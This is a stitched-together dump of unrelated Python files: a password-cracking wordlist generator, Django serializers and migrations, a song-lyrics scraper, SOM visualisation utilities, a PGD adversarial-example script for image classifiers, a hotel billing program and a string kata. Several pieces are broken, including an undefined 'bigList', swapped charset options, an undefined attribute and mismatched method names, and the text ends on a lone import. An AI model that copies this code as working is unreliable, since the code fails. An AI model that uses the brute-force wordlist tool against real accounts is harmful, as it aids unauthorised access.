# This is a program which generates password list
import itertools
f = open("wordlist.txt","w")
capletters = ["A","B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]
smallletters = ["a","b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t","u","v","w", "x", "y" ,"z"]
numbers = ["1","2", "3", "4", "5", "6", "7", "8", "9", "0"]
symbols = ["@", "%", "&", "*", "(",")","#","!"]
choice = 0
def xselections(items, n):
if n==0: yield []
else:
for i in xrange(len(items)):
for ss in xselections(items, n-1):
yield [items[i]]+ss
while int(choice) not in range(1,15):
choice = raw_input('''
1) Numbers
2) Capital Letters
3) Lowercase Letters
4) Numbers + Capital Letters
5) Numbers + Lowercase Letters
6) Numbers + Capital Letters + Lowercase Letters
7) Capital Letters + Lowercase Letters
8) Numbers + symbols
9) Capital Letters + symbols
10) Lowercase letters + symbols
11) Numbers + Capital Letters + symbols
12) Numbers + Lowercase letters + symbols
13) Numbers + Capital letters + Lowercase letters + symbols
14) Capital letters + Lowercase letters + symbols
: ''')
choice = int(choice)
mlist = []
if choice == 1:
mlist = numbers
elif choice == 2:
mlist = capletters
elif choice == 3:
mlist = smallletters
elif choice == 4:
mlist = numbers + capletters
elif choice == 5:
mlist = numbers + capletters
elif choice == 6:
mlist = numbers + capletters + smallletters
elif choice == 7:
mlist = capletters + smallletters
elif choice == 8:
mlist = numbers + symbols
elif choice == 9:
mlist = capletters + symbols
elif choice == 10:
mlist = smallletters + symbols
elif choice == 11:
mlist = numbers + smallletters + symbols
elif choice == 12:
mlist = numbers + capletters + symbols
elif choice == 13:
mlist = numbers + capletters + smallletters + symbols
elif choice == 14:
mlist = capletters + smallletters + symbols
MIN = input(int("What is the min size of the word? "))
MAX = input(int("What is the max size of the word? "))
for i in range(MIN,MAX+1):
for s in xselections(bigList,i): f.write(''.join(s) + '\n')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ctrl_citylist import CitylistCtrl
from common.cache import pop_portal_id
if __name__ == '__main__':
while True:
portal_id = pop_portal_id()
print(portal_id)
clc = CitylistCtrl(portal_id = portal_id)
clc.entry()
|
from modules import cell as c, explosion as ex, explosive as exive
class Empty(c.Cell, exive.Explosive):
def __init__(self, position):
self._position = position
@property
def position(self):
return self._position
@position.setter
def set_position(self, position):
self._position = position
def explode(self, gamefield, ex_type, user):
gamefield[self._position.y][self._position.x] = ex.Explosion(
self._position, ex_type=ex_type, user=user)
def should_continue_explode(self, ex_type):
return True
@property
def extra_range(self):
return 0
def action(self, gamefield, tick_time):
return
def contact(self, user):
return
def is_passable(self, user):
return True
@property
def image_name(self):
return None
|
from rest_framework import serializers
from .models import Transaction, PolicyRule, PolicyRuleDestination
class TransactionSerializer(serializers.ModelSerializer):
class Meta:
model = Transaction
fields = ['id', 'amount', 'destination', 'outgoing']
class PolicyRuleDestinationSerializer(serializers.ModelSerializer):
class Meta:
model = PolicyRuleDestination
fields = ['address']
def to_internal_value(self, data):
return {'address': data}
def to_representation(self, instance):
return instance.address
class PolicyRuleSerializer(serializers.ModelSerializer):
destinations = PolicyRuleDestinationSerializer(many=True, required=False, allow_null=True)
class Meta:
model = PolicyRule
fields = ['id', 'amount', 'destinations']
def create(self, validated_data):
dests_data = validated_data.pop('destinations')
rule = PolicyRule.objects.create(**validated_data)
if dests_data:
for dest_data in dests_data:
PolicyRuleDestination.objects.create(rule=rule, **dest_data)
return rule
def update(self, instance, validated_data):
instance.amount = validated_data['amount']
dests_data = validated_data.pop('destinations')
# to support additions and deletions, clear out all destinations
PolicyRuleDestination.objects.filter(rule_id=instance.id).delete()
# re-add destinations according to request data
if dests_data:
for dest_data in dests_data:
PolicyRuleDestination.objects.create(rule=instance, **dest_data)
return instance
|
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib import cm
from matplotlib.colors import Normalize
from tensorflow import keras
from som_keras.classification import classify_SOM, cluster_SOM
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
def visualize_labels(model, data=None, labels=None, bsize=32,
normalize=False, lab_names=None, **kwargs):
'''
Assigns each data sample to a neuron in the SOM's 2D grid. For each position
in the grid, displays the one with more ocurrences.
data: (tf tensor) input data in format (n_samples x n_features)
labels: (tf tensor) with the corresponding labels
bsize: (int) batch size when evaluating
normalize: (bool) whether to divide the counts by the total amount
of samples of each label respectively. Recommended
for unbalanced datasets.
lab_names: (list) if not none, uses this list to construct a legend.
returns
f: matplotlib figure
'''
# If SOM grid has not been classified yet, uses input
# to perform the classification
if model.counts is None:
assert(data is not None and labels is not None)
classify_SOM(model, data, labels, bsize, normalize)
f = plt.imshow(model.labels.reshape((model.dim_len[0], model.dim_len[1])), **kwargs)
if lab_names is not None:
labs = np.unique(model.labels)
# In case some neurons do not have label
if -1 in labs:
lab_names = ['Not assigned']+lab_names
# Get color for each label
colors = [f.cmap(f.norm(lab)) for lab in labs]
patches = [mpatches.Patch(color=colors[i], label=lab_names[i]) for i in range(len(labs))]
plt.legend(handles=patches, bbox_to_anchor=(1.75, 1))
return f
def visualize_histograms(model, data=None, labels=None, bsize=32,
normalize=False, **kwargs):
'''
Works as visualiza_labels, but instead plots the histogram of labels
in each position of the grid.
data: (tf tensor) input data in format (n_samples x n_features)
labels: (tf tensor) with the corresponding labels
bsize: (int) batch size when evaluating
get_counts: (bool) whether to return the ocurrences per
position of the grid (True) or plot the results (False)
normalize: (bool) whether to divide the counts by the total amount
of samples of each label respectively. Recommended
for unbalanced datasets.
lab_names: (list) if not none, uses this list to construct a legend.
returns:
f: (matplotlib figure)
'''
if model.counts is None:
assert(data is not None and labels is not None)
classify_SOM(model, data, labels, bsize, normalize)
labs = model.counts.shape[1]
f = plt.figure()
for i, count in enumerate(model.counts):
ax = f.add_subplot(model.dim_len[0], model.dim_len[1], i+1)
ax.bar(np.arange(labs), count, **kwargs)
plt.xticks([])
plt.yticks([])
def plot_dimred_pca(model, pca_data=None, connect=False,
use_labels=False, get_projs=False,
lab_names=None, **kwargs):
'''
Uses PCA to represent the grid's weights in a 2D space.
pca_data: If not None, uses this data to perform the PCA
Otherwise, it uses the weights.
connect: whether to connect adjacent nodes on the grid.
use_labels: if True and SOM neurons have been classified
using classify SOM, it plots each point with
a color corresponding to its class.
get_projs: whether to return the projections (True)
or the 2D plot (False)
**kwargs: extra arguments for PCA
returns
f: matplotlib figure
'''
weights = model.w.numpy().T
# Fit PCA
pca = PCA(n_components=2, **kwargs)
if pca_data is not None:
pca.fit(pca_data)
else:
pca.fit(weights)
exp_var = pca.explained_variance_ratio_
print(f'Component 1 - Var_ratio = {exp_var[0]:.2f} , Component 2 - Var_ratio = {exp_var[1]:.2f}')
# Return weights
projs = pca.transform(weights)
if get_projs:
return projs
# Plot weights
f = plt.figure()
if not use_labels:
plt.scatter(projs[:, 0], projs[:, 1])
else:
assert(model.labels is not None)
plt.scatter(projs[:, 0], projs[:, 1], c=model.labels)
# Show legend if labels are given
if lab_names is not None:
if len(np.unique(model.labels)) > len(lab_names):
lab_names = ['Not assigned'] + lab_names
norm = Normalize(vmin=-1, vmax=len(lab_names)-2)
else:
norm = Normalize(vmin=0, vmax=len(lab_names)-1)
scatters = []
for i in np.unique(model.labels):
color = cm.viridis(norm(i))
scat = plt.scatter(projs[model.labels == i, 0], projs[model.labels == i, 1], color=color)
scatters.append(scat)
plt.legend(scatters, lab_names)
plt.xlabel(f'Principal Component 1 ({100*exp_var[0]:.0f}%)')
plt.ylabel(f'Principal Component 2 ({100*exp_var[1]:.0f}%)')
if connect:
adjmat = model._construct_adjmat(False).toarray()
for i, row in enumerate(adjmat):
for j, entry in enumerate(row):
if entry > 0:
plt.plot([projs[i, 0], projs[j, 0]], [projs[i, 1], projs[j, 1]], '-k')
return f
def plot_dimred_tsne(model, connect=False, get_projs=False,
use_labels=False, lab_names=None, **kwargs):
'''
Uses TSNE to represent the grid's weights in a 2D space.
connect: whether to connect adjacent nodes on the grid.
use_labels: if True and SOM neurons have been classified
using classify SOM, it plots each point with
a color corresponding to its class.
get_projs: whether to return the projections (True)
or the 2D plot (False)
**kwargs: extra arguments for TSNE
returns:
f: matplotlib figure
'''
weights = model.w.numpy().T
# Project using TSNE
tsne = TSNE(n_components=2, **kwargs)
projs = tsne.fit_transform(weights)
print(f'Number of iterations: {tsne.n_iter:.0f}, Final KLD: {tsne.kl_divergence_:.4f}')
if get_projs:
return projs
# Plot weights
f = plt.figure()
if not use_labels:
plt.scatter(projs[:, 0], projs[:, 1])
else:
assert(model.labels is not None)
plt.scatter(projs[:, 0], projs[:, 1], c=model.labels)
# Show legend if labels are given
if lab_names is not None:
if len(np.unique(model.labels)) > len(lab_names):
lab_names = ['Not assigned'] + lab_names
norm = Normalize(vmin=-1, vmax=len(lab_names)-2)
else:
norm = Normalize(vmin=0, vmax=len(lab_names)-1)
scatters = []
for i in np.unique(model.labels):
color = cm.viridis(norm(i))
scat = plt.scatter(projs[model.labels == i, 0], projs[model.labels == i, 1], color=color)
scatters.append(scat)
plt.legend(scatters, lab_names)
if connect:
adjmat = model._construct_adjmat(False).toarray()
for i, row in enumerate(adjmat):
for j, entry in enumerate(row):
if entry > 0:
plt.plot([projs[i, 0], projs[j, 0]], [projs[i, 1], projs[j, 1]], '-k')
return f
def plot_class_prototypes(prototypes, features_dim1, features_dim2,
labs_x = None, labs_y = None,
plot_shape=None, lab_names=None,
figure=None, **kwargs):
'''
prototypes: class prototypes with shape (num_classes, num_features)
features_dim1: number of features on the x axis
features_dim2: number of features on the y axis
labs_x: labs to use in the x axis
labs_y: labs to use on the y axis
plot_shape: shape of the image representing the features
lab_names: list of names of each label
**kwargs: arguments for imshow
'''
if figure is None:
figure = plt.figure(None, (35, 15))
if plot_shape is None:
plot_shape = [1, prototypes.shape[0]]
for i, prototype in enumerate(prototypes):
ax = figure.add_subplot(plot_shape[0], plot_shape[1], i+1)
ax.imshow(prototype.reshape((features_dim1, features_dim2)), **kwargs)
if labs_y is not None:
ax.set_xticks(np.arange(features_dim2), minor=False)
ax.xaxis.tick_top()
ax.set_xticklabels(labs_y, minor=False)
if labs_x is not None:
ax.set_yticks(np.arange(features_dim1), minor=False)
ax.set_yticklabels(labs_x, minor=False)
if lab_names is not None:
plt.title(lab_names[i])
def _grid_to_Umat(model, idxs):
neurons_row = model.dim_len[1]
Umat_rowlen = 2*model.dim_len[1]-1
# Get vertical and horizontal distances
hdist = (idxs[1]-idxs[0])%neurons_row*np.sign(idxs[1]-idxs[0])
vdist = (idxs[1]-idxs[0])//neurons_row
# Get idx[0]'s position on the Umat
pos = 2*idxs[0]+(Umat_rowlen-1)*(idxs[0]//neurons_row)
# Add distances to index
Umat_idx = pos+hdist+vdist*Umat_rowlen
return Umat_idx
def get_Umat(model, mean_dist=True, connect8=True):
'''
Builds the U-matrix corresponding to the trained grid.
mean_dist: if True, matrix has same shape as grid and at each
neuron, the mean distance to its neighbours is
represented. Otherwise the matrix is bigger and
distances corresponding to all connections are represented
surrounding the neurons (which have value 0)
connect8: whether to consider diagonal connections as neighbours.
'''
# Get distance from each weight to the rest
all_dists = model._distance_matrix(tf.transpose(model.w)).numpy()
# For each neuron, get its neighbours
adj_mat = model._construct_adjmat(connect8).toarray()
if mean_dist:
# Set distances to non adjacent neurons to 0
neig_dists = all_dists*adj_mat
# Compute mean distance
Umat_flat = np.sum(neig_dists, axis=1)/np.sum(neig_dists > 0, axis=1)
Umat = Umat_flat.reshape((model.dim_len[0], model.dim_len[1]))
else:
# Get distances only corresponding to neighbours
pair_idx = np.indices((model.dim_len[0]*model.dim_len[1],
model.dim_len[0]*model.dim_len[1]))
pair_idx = np.transpose(pair_idx, [1, 2, 0])
pair_idx = pair_idx[adj_mat.astype(bool)]
neig_dists = all_dists[adj_mat.astype(bool)]
# Filter repeated distances
valid = pair_idx[:, 0] <= pair_idx[:, 1]
neig_dists = neig_dists[valid]
pair_idx = pair_idx[valid]
# Translate indices from grid to U-mat indices
neig_indices = np.apply_along_axis(_grid_to_Umat(model), 1, pair_idx)
# Build U-matrix using distances and indices
Umat = np.zeros((2*model.dim_len[0]-1)*(2*model.dim_len[1]-1))
Umat[neig_indices] = neig_dists
Umat = Umat.reshape((2*model.dim_len[0]-1, 2*model.dim_len[1]-1))
return Umat
def plot_cluster_dists(model, nclusts, data_pos, data_labs,
lab_names=None, get_means=True,
figure=None, **kwargs):
'''
For each cluster plots the amount of samples of each class in it.
model: SOM model
nclusts: number of clusters to use
data_pos: input's data predicted positions in the SOM grid
data_labs: input's data corresponding labels
lab_names: names for the different labels
get_means: whether to also compute each cluster mean
**kwargs: arguments for plt.bar
returns:
means: (np array) if get_means is True returns array of
cluster means of shape (n_clusters x n_features)
'''
# Predict cluster labels for SOM and data
clust_SOM = cluster_SOM(model, nclusts)
clust_data = clust_SOM[data_pos]
# Vector to store each cluster mean
weights = model.w.numpy().T
means = np.zeros((len(np.unique(clust_SOM)), weights.shape[1]))
if figure is None:
figure = plt.figure(None, (35, 15))
for clust in np.unique(clust_SOM):
# Count occurences of each class
counts = np.zeros(len(np.unique(data_labs)))
for i, lab in enumerate(np.unique(data_labs)):
counts[i] = np.sum(data_labs[clust_data == clust] == lab)
# Bar plot
figure.add_subplot(4, 3, clust+1)
if lab_names is None:
lab_names = np.unique(data_labs)
plt.bar(lab_names, counts, **kwargs)
plt.title(f'Cluster {clust:.0f}')
# Compute cluster mean
means[clust] = np.mean(weights[clust_SOM == clust], axis=0)
if get_means:
return means
|
# Generated by Django 2.2.1 on 2019-05-07 04:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('portalapp', '0002_auto_20190507_0424'),
]
operations = [
migrations.RenameField(
model_name='points',
old_name='efoort',
new_name='effort',
),
]
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simplest-possible build of a "Hello, world!" program
using an explicit build target of 'hello'.
"""
import TestGyp
test = TestGyp.TestGyp(workdir='workarea_target')
test.run_gyp('hello.gyp')
test.build('hello.gyp', 'hello')
test.run_built_executable('hello', stdout="Hello, world!\n")
test.up_to_date('hello.gyp', 'hello')
test.pass_test()
|
import nltk
import re
nltk.download('punkt')
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
def stripTags(pageContents): # Removes the headers of the html
startLoc = pageContents.find('<p>')
endLoc = pageContents.find('<br/>')
pageContents = pageContents[startLoc:endLoc]
return pageContents
def deleteTags(pageContents): # This removes the rest of the html components that not corresponds to the original text
text = []
for char in pageContents:
if char == '<':
inside = 1
elif inside == 1 and char == '>':
inside = 0
elif inside == 1:
continue
else:
text += char
return text
def deleteStopwords(text): # This function removes the stop words
text_tokens = word_tokenize(text)
tokens = [word for word in text_tokens if not word in stopwords.words()]
weird_characters = [ "\\xc2\\xa0", "\r\n\t\t\t\t\t" ]
tokens_clean = [word for word in tokens if not word in weird_characters]
return re.compile(r'\W+',re.UNICODE).split(" ".join(tokens_clean))
#return tokens_clean
def cleaner(query, number_of_files) :
query = str(number_of_files) + "_" + query
opener = open(query + "_full_text.txt", 'r')
original_text = opener.read()
text = stripTags(original_text)
text = deleteTags(text)
text = "".join(text)
text = ' '.join(text.split())
text = deleteStopwords(text)
text = " ".join(text)
fl = open(query + "_cleaned.txt", 'a')
fl.write(text)
|
import requests
import urllib.parse as urlparse
from bs4 import BeautifulSoup
import pandas as pd
import time
import os
base_url = 'https://www.uta-net.com/'
url_by_artist = 'https://www.uta-net.com/artist/2750/4/'
response = requests.get(url_by_artist)
soup = BeautifulSoup(response.text, 'lxml')
links = soup.find_all('td', class_='side td1')
def get_lyrics(url):
time.sleep(1)
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
song_title = soup.find('div', class_='title').get_text().replace('\n','')
# 歌詞詳細ページ
song_lyrics = soup.find('div', itemprop='lyrics')
song_lyric = song_lyrics.text
song_lyric = song_lyric.replace('\n','')
return song_title,song_lyric
def scraping(url_by_artist, f_path):
df = pd.DataFrame()
base_url = 'https://www.uta-net.com/'
response = requests.get(url_by_artist)
soup = BeautifulSoup(response.text, 'lxml')
links = soup.find_all('td', class_='side td1')
titles = []
lyrics = []
for link in links:
_url = urlparse.urljoin(base_url,link.a.get('href'))
song_title,song_lyric = get_lyrics(_url)
titles.append(song_title)
lyrics.append(song_lyric)
df['title'] = titles
df['lyric'] = lyrics
df.to_pickle(f_path)
def main():
# yuming
url_by_artist = 'https://www.uta-net.com/artist/2750/4/'
f_path = '../../data/lyrics/m.matsutouya/lyrics.pkl'
scraping(url_by_artist,f_path)
# miyuki oneisama
url_by_artist = 'https://www.uta-net.com/artist/3315/4/'
f_path = '../../data/lyrics/m.nakajima/lyrics.pkl'
scraping(url_by_artist,f_path)
main()
|
import os
import logging
logger = logging.getLogger(__name__)
from django.conf.global_settings import MEDIA_ROOT
from django.db import models
from audited_models.models import AuditedModel
from .version import Version
class ApprovedProjectManager(models.Manager):
"""Custom project manager that shows only approved records."""
def get_query_set(self):
"""Query set generator"""
return super(
ApprovedProjectManager, self).get_query_set().filter(
approved=True)
class UnapprovedProjectManager(models.Manager):
"""Custom project manager that shows only unapproved records."""
def get_query_set(self):
"""Query set generator"""
return super(
UnapprovedProjectManager, self).get_query_set().filter(
approved=False)
class Project(AuditedModel):
"""A project model e.g. QGIS, InaSAFE etc."""
name = models.CharField(
help_text='Name of this project.',
max_length=255,
null=False,
blank=False,
unique=True)
image_file = models.ImageField(
help_text=('A logo image for this project. '
'Most browsers support dragging the image directly on to the '
'"Choose File" button above.'),
upload_to=os.path.join(MEDIA_ROOT, 'images/projects'),
blank=True)
approved = models.BooleanField(
help_text='Whether this project has been approved for use yet.',
default=False
)
objects = ApprovedProjectManager()
all_objects = models.Manager()
unapproved_objects = UnapprovedProjectManager()
class Meta:
app_label = 'changes'
def __unicode__(self):
return u'%s' % self.name
def versions(self):
"""Get all the versions for this project."""
qs = Version.objects.filter(project=self).order_by('name')
return qs
|
#-*-coding:utf8-*-
from lxml import etree
htmlsrc = '''
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<div id="content">
<ul id="useful">
<li>abc1</li>
<li>abc2</li>
</ul>
<ul id="useless">
<li>没用1</li>
<li>没用2</li>
</ul>
<div id="url">
<a href="http://www.douban.com">douban</a>
<a href="http://www.baidu.com" title="baidu">百度</a>
</div>
</div>
</body>
</html>
'''
selector = etree.HTML(htmlsrc)
content = selector.xpath('//ul[@id="useful"]/li/text()')
for item in content:
print item
print ''
link = selector.xpath('//a/@href')
for item in link:
print item
print ''
title = selector.xpath('//a/@title')
print title[0]
print ''
cn = selector.xpath('//a/text()')
for item in cn:
print item.encode('utf-8')
|
# -*- coding: utf-8 -*-
"""
@author: Zhen-Wang
此代码的作用为对训练好的原始模型进行样本的PGD攻击,生成对抗样本。
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
from tensorflow.examples.tutorials.mnist import input_data
#import cifar10_input
class LinfPGDAttack:
def __init__(self, model, epsilon, num_steps, step_size, random_start):
"""Attack parameter initialization. The attack performs k steps of
size a, while always staying within epsilon from the initial
point."""
self.model = model
self.epsilon = epsilon
self.num_steps = num_steps
self.step_size = step_size
self.rand = random_start
loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model.logit, labels=model.y_input))
# 出来的是一个列表,取第一个元素为代表x_input导数的数组
self.grad = tf.gradients(loss, model.x_input)[0]
def perturb(self, x_nat, y, sess):
"""Given a set of examples (x_nat, y), returns a set of adversarial
examples within epsilon of x_nat in l_infinity norm."""
if self.rand:
x = x_nat + np.random.uniform(-self.epsilon, self.epsilon, x_nat.shape)
x = np.clip(x, 0, 255) # ensure valid pixel range
else:
x = np.copy(x_nat)
for i in range(self.num_steps):
grad = sess.run(self.grad, feed_dict={self.model.x_input: x,
self.model.y_input: y})
x = np.add(x, self.step_size * np.sign(grad), out=x, casting='unsafe')
x = np.clip(x, x_nat - self.epsilon, x_nat + self.epsilon)
x = np.clip(x, 0, 255) # ensure valid pixel range
return x
if __name__ == '__main__':
import sys
import math
from model_lib import MobileNet
#model_dir = "models/natural_alexnet"
#model_dir = "models/robust_alexnet"
data_path = '/public/home/cjy/Documents/Dataset/DNN/fashion_data'
model_dir = '/public/home/cjy/Documents/Python/DNN/code-mnist/mobilenet_eval/models-f/robust_mobilenet'
model_file = tf.train.latest_checkpoint(model_dir)
if model_file is None:
print('No model found')
sys.exit()
model = MobileNet(is_training=True)
attack = LinfPGDAttack(model = model,
epsilon = 0.3, #cifar10 为1.0
num_steps = 10,
step_size = 2.0,
random_start = 1)
saver = tf.train.Saver()
mnist = input_data.read_data_sets(data_path, one_hot=False)
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
gpuconfig = tf.ConfigProto()
gpuconfig.gpu_options.allow_growth = True
with tf.Session(config=gpuconfig) as sess:
# Restore the checkpoint
saver.restore(sess, model_file)
print("restore checkpoint:{}".format(model_file))
# Iterate over the samples batch-by-batch
num_eval_examples = 10000
eval_batch_size = 200
num_batches = int(math.ceil(num_eval_examples / eval_batch_size))
x_adv = [] # adv accumulator
print('Iterating over {} batches'.format(num_batches))
for ibatch in range(num_batches):
bstart = ibatch * eval_batch_size
bend = min(bstart + eval_batch_size, num_eval_examples)
print('batch size: {}'.format(bend - bstart))
x_batch = mnist.test.images[bstart:bend, :]
y_batch = mnist.test.labels[bstart:bend]
x_batch_adv = attack.perturb(x_batch, y_batch, sess)
x_adv.append(x_batch_adv)
print('Storing examples')
path = "/public/home/cjy/Documents/Python/DNN/code-mnist/mobilenet_eval/fashion-robust-attack.npy"
x_adv = np.concatenate(x_adv, axis=0)
np.save(path, x_adv)
print('Examples stored in {}'.format(path))
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
prenoms = ["Anthony", "Mathilde", "Simon", "Mateu", "Ugo"]
prenoms.sort()
print(prenoms)
list_prenoms = ["Anthony", "Mathilde", "Simon", "Mateu", "Ugo"]
s_prenom = sorted(list_prenoms)
print(s_prenom)
print(list_prenoms)
etudiants = [
("Clément", 14, 16),
("Charles", 12, 15),
("Oriane", 14, 18),
("Thomas", 11, 12),
("Damien", 12, 15),
]
print(sorted(etudiants))
print(sorted(etudiants, key=lambda colonne : colonne[2]))
|
class hotelkingston:
def __init__(self, rt='', n=0, s=0,r=0,c = 0, d = 0, a = 1800, Name='',Address='', cindate = '', coutdate='', rowno = 100):
print("WELCOME TO KINGSTON HOTEL")
print("Izhevsk, Russia, Pecochnaya 38A 426069:\n")
self.rt = rt
self.r = r
self.t = ''
self.a = a
self.n = n
self.s = s
self.c = c
self.d = d
self.Name = Name
self.address = Address
self.cindate = cindate
self.coutdate = coutdate
self.rowno = rowno
def inputData(self):
self.Name = input("Enter your Name:")
self.Address = input("Enter your Address:")
self.cindate = input("Enter your Arrival date:")
self.coutdate = input("Enter your Departure date:")
print("Your room no.:", self.rowno, "\n")
def roomRent(self):
print(" Please select your category of room:-")
print("Note that prices are just for a night ")
print("1. Single_Room -- $50 \n")
print("2. Double_Room --$100 \n")
print("3. Triple_Room -- $150 \n")
print("4. Queens_Room --$250 \n")
print("5. kings_Room --$400 \n")
x = int(input(" Please enter Your Choice Please from One(1) - Five(5) "))
n = int(input(" How many nights would you like to stay:"))
if (x == 1):
print("Thanks for choosing a Single_Room")
self.s = 50 * n
elif (x == 2):
print("Thanks for choosing a Double_Room")
self.s = 100 * n
elif (x == 3):
print("Thanks for choosing a Triple_Room")
self.s = 150 * n
elif (x == 4):
print("Thanks for choosing a Queens_Room")
self.s = 250 * n
elif (x == 5):
print("Thanks for choosing a Kings_Room")
self.s = 400 * n
else:
print(" Please choose a room")
print(" Rent =", self.s, "\n")
def restaurentBill(self):
print("RESTAURANT MENU")
print("1.Water = $0.5 ",
"2.Tea = $0.75",
"3.Breakfast porridge = $2.00",
"4.Lunch meat spaghetti = $5.00",
"5.Dinner potatoes fries = $ 3.50",
"6.Exit")
while (1):
c = int(input("Enter your choice:"))
if (c == 1):
d = int(input("Enter the quantity:"))
self.r = self.r + 0.5 * d
elif (c == 2):
d = int(input("Enter the quantity:"))
self.r = self.r + 0.75 * d
elif (c == 3):
d = int(input("Enter the quantity:"))
self.r = self.r + 2.00 * d
elif (c == 4):
d = int(input("Enter the quantity:"))
self.r = self.r + 5.00 * d
elif (c == 5):
d = int(input("Enter the quantity:"))
self.r = self.r + 3.50 * d
elif (c == 6):
break;
else:
print("Invalid option")
print("Total food Cost= $", self.r, "\n")
def gamebill(self):
print("GAME MENU")
print("1.Table_tennis = $5.00", "2.Bowling = $10.00","3.Video_games = $10.00",
"4.Pool = $15.00", "5.Exit")
while (1):
g = int(input("Enter your choice:"))
if (g == 1):
h = int(input("No. of hours required:"))
self.p = self.p + 5.00 * h
elif (g == 2):
h = int(input("No. of hours:"))
self.p = self.p + 10.00 * h
elif (g == 3):
h = int(input("No. of hours:"))
self.p = self.p + 10.00 * h
elif (g == 4):
h = int(input("No. of hours:"))
self.p = self.p + 15.00 * h
elif (g == 5):
break;
else:
print("Invalid option")
print("Total Game Bill=$", self.p, "\n")
def display(self):
a = hotelkingston()
print("HOTEL BILl")
print("Clients Information:")
print("Clients Name:", self.Name)
print("Clients Address:", self.Address)
print("Arrival Date:", self.cindate)
print("Departure Date", self.coutdate)
print("Room_no.", self.rowno)
print("Rent:", self.s)
print("Food bill:", self.r)
print("Game bill :", self.p)
self.rt = self.s + self.t + self.p + self.r
print("Sub total bill:", self.rt)
print("Additional Service Charges ", self.a)
print("Grandtotal bill :", self.rt + self.a, "\n")
self.rno += 1
def main():
a = hotelkingston()
while (1):
print("1.Enter Clients Information")
print("2.Calculate Rent")
print("3.Calculate Restaurant_bill")
print("4.Calculate Game_bill")
print("5.Total_cost")
print("6.EXIT")
b = int(input("enter your choice:"))
if (b == 1):
a.inputdata()
if (b == 2):
a.roomrent()
if (b == 3):
a.restaurentbill()
if (b == 4):
a.gamebill()
if (b == 5):
a.display()
if (b == 6):
quit()
main()
|
#All Configurations
FILE_DUPLICATE_NUM = 2 # how many replications stored
FILE_CHUNK_SIZE = 1024*1024 # 1KB, the chunk size, will be larger when finishing debugging
HEADER_LENGTH = 16 # header size
SAVE_FAKE_LOG = False # for single point failure, will greatly reduce the performance
IGNORE_LOCK = True # for test purpose
SERVER_LOG_FILE_NAME = 'server_write_log'
# some common convert functions shared by server and client
def name_local_to_remote(name):
return name.replace('/','[[')
def name_remote_to_local(name):
return name.replace('[[','/')
|
import os
import sys
sys.path.insert(0, 'scripts')
import experiments as exp
sys.path.insert(0, os.path.join("tools", "families"))
sys.path.insert(0, os.path.join("tools", "mappings"))
import fam
import ete3
import get_dico
def build_short_names_seq():
alphabet = " ABCDEFGHIJKLMNOPQRSTUVWXYZ"
seq = []
for a in alphabet:
for b in alphabet[1:]:
seq.append((a + b).replace(" ", ""))
return seq
def get_short_mapping(datadir):
true_species_tree = ete3.Tree(fam.get_species_tree(datadir), format = 1)
short_mapping = {}
index = 1
short_names_seq = build_short_names_seq()
short_mapping_file = os.path.join(fam.get_misc_dir(datadir), "short_mappings.txt")
writer = open(short_mapping_file, "w")
print("Writting short mapping in " + short_mapping_file)
for name in true_species_tree.get_leaf_names():
writer.write(short_names_seq[index] + " " + name + "\n")
short_mapping[name] = short_names_seq[index]
index += 1
return short_mapping
def relabel_gene_trees(datadir, gene_trees, subst_model):
short_mapping = get_short_mapping(datadir)
for family in fam.get_families_list(datadir):
try:
gene_tree_path = fam.build_gene_tree_path(datadir, subst_model, family, gene_trees)
output_gene_tree_path = gene_tree_path + ".shortlabels"
tree = ete3.Tree(gene_tree_path)
for leaf in tree.get_leaves():
mapping = get_dico.get_gene_to_species(datadir, family)
leaf.name = short_mapping[mapping[leaf.name]]
open(output_gene_tree_path, "w").write(tree.write())
except:
print("Error for family " + family)
def relabel_species_tree(datadir, species_tree, subst_model):
short_mapping = get_short_mapping(datadir)
tree_path = fam.get_species_tree(datadir, subst_model, species_tree)
print("Relabelling " + tree_path)
tree = ete3.Tree(tree_path, format = 1)
for leaf in tree.get_leaves():
leaf.name = short_mapping[leaf.name]
output_tree_path = tree_path + ".shortlabels"
open(output_tree_path, "w").write(tree.write())
print(tree)
print("Writting new tree in " + output_tree_path)
if (__name__== "__main__"):
if (len(sys.argv) == 5):
mode = sys.argv[1]
datadir = sys.argv[2]
method = sys.argv[3]
subst_model = sys.argv[4]
if (mode == "genes"):
relabel_gene_trees(datadir, method, subst_model)
elif(mode == "species"):
relabel_species_tree(datadir, method, subst_model)
else:
print("Invalid mode " + mode)
else:
print("Syntax:")
print(" mode datadir tree_method subst_model")
sys.exit(0)
|
def count_correct_characters(correct, guess):
if len(correct)!=len(guess): raise "different length"
return sum(1 for x in range(len(correct)) if correct[x]==guess[x])
'''
Consider a game, wherein the player has to guess a target word.
All the player knows is the length of the target word.
To help them in their goal, the game will accept guesses, and return
the number of letters that are in the correct position.
Write a method that, given the correct word and the player's guess,
returns this number.
For example, here's a possible thought process for someone trying to
guess the word "dog":
count_correct_characters("dog", "car"); #0 (No letters are in the correct position)
count_correct_characters("dog", "god"); #1 ("o")
count_correct_characters("dog", "cog"); #2 ("o" and "g")
count_correct_characters("dog", "cod"); #1 ("o")
count_correct_characters("dog", "bog"); #2 ("o" and "g")
count_correct_characters("dog", "dog"); #3 (Correct!)
The caller should ensure that the guessed word is always the same length as the correct word,
but since it could cause problems if this were not the case, you need to check for this eventuality:
#Raise an exception if the two parameters are of different lengths.
You may assume, however, that the two parameters will always be in the same case.
'''
|
from binance_f import RequestClient
